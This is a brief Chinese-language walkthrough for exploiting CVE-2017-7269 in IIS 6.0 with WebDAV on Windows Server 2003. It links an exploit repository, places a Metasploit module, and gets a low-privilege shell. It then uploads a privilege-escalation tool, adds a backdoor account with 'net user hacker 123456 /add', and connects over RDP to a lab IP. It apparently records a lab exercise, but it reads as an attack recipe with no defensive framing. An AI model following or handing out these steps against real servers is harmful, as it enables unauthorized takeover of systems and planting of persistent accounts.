（CVE-2017-7269 ） IIS6.0实现远程控制

简介

IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁

 

利用条件

Windows 2003 R2开启WebDAV服务的IIS6.0

 

 

环境搭建

1. Windows server 2003 R2 安装IIS服务,并且开启了WebDAV
2. Exp下载地址：https://github.com/zcgonvh/cve-2017-7269
3. pr.exe提权工具
   
4. 3389.bat

漏洞利用

第一步：IIS开启WebDAV

第二步：Cp cve-2017-7269.rb  /usr/share/metasploit-framework/modules/exploits/windows/iis/

第三步：使用模块,设置参数

第四步：开始攻击,获得一个shell，获得的是一个低权限用户

第五步：上传pr.exe到目标服务器上

第六步：pr.exe "net user hacker 123456 /add"
第七步：rdesktop 192.168.0.135 连接3389